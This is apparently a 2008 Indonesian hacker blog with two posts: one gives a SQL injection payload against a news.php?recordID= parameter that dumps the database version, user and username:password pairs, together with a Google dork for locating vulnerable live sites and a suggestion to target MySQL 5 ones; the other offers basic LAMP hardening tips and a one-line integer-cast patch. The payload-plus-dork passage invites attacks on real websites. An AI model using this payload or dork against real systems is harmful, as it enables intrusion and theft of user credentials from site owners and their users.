silahkan liat di milw0rm
ato di mbah google
eh di echo juga ada

ini salah satu links gw yg gw coba di localhost
http://localhost/news.php?recordID=-1 union all select 1,2,version(),user(),database(),concat_ws(username,0x3a,password),7,8 from user--

Ini hanyalah sebuah penelitian
dan gw coba cari di google dgn keyword:

inurl:.php?recordID=


ternyata hasilnya banyak juga
dan carilah yg versi 5 yiahh,,hehe

Dan untuk anda yg kebetulan belum mempatch
caranya mudah sekali,hihi
uda tau function GetSQLValueString di dreamweaver 8 ?
yah pake aja itu kalo masih tetep nyalain magic quotes nya
contoh script nya
untuk id gunakana type int

$recordID = GetSQLValueString($_GET['recordID'], "int");


okeyzzz
CMIIW
untuk lebih lanjut contact me aja
Thx

juniorsev3n

Selasa, 22 Januari 2008

Linux Apache Mysql Php

LAMP mungkin ini solusi buat para admin dalam sebuah website di indonesia. Karena menurut saya pada dasarnya dalam sebuah website itu memerlukan security, design yang menarik(php menurut saya). sebenernya sekarang masih banyak admin di indonesia yang tidak mementingkan security, hanya ada design yang menarik dan tidak mempedulikan hole pada sebauh websitenya.
LAMP menurut saya konsep yang menarik karena didalamnya terdapat:
-Linux (menurut saya distro apapun,,bisa dipakai);
-Apache (meskipun banyak pesaingnya,,ini yang paling terkenal dan simple);
-Mysql (sebagai menyimpanan database);
-Php (bahasa yang banyak dipakai dan fleksible,,keren lah kalau anda mengerti
banyak ttg script2 php,,bisa dikunjungi di www.php.net
sebenarnya itu semua berbalik ke admin itu sendiri,,
karena pada dasarnya bila admin itu mempatch hole pada websitenya,,
mungkin tidak ada hacking..(meskipun admin memakai SO[w1nd0ws])
Bila anda memakai LAMP janganlah anda memakai user [root] karena anda tahu sendiri kan
bahwa root adalah user tingkat yang paling tinggi di linux.

Percuma bila anda memakai LAMP tetapi anda memakai user root pada website itu,,
tahu sendiri mungkin bahayanya.
Dan mungkin satu saran dari saya jangan memasang perm 777,,alias yang banyak di deface.
Apabila anda memakai web software yang kebanyakan mempunyai hole ,,patch lah hole tersebut..

hehe maap kalo salah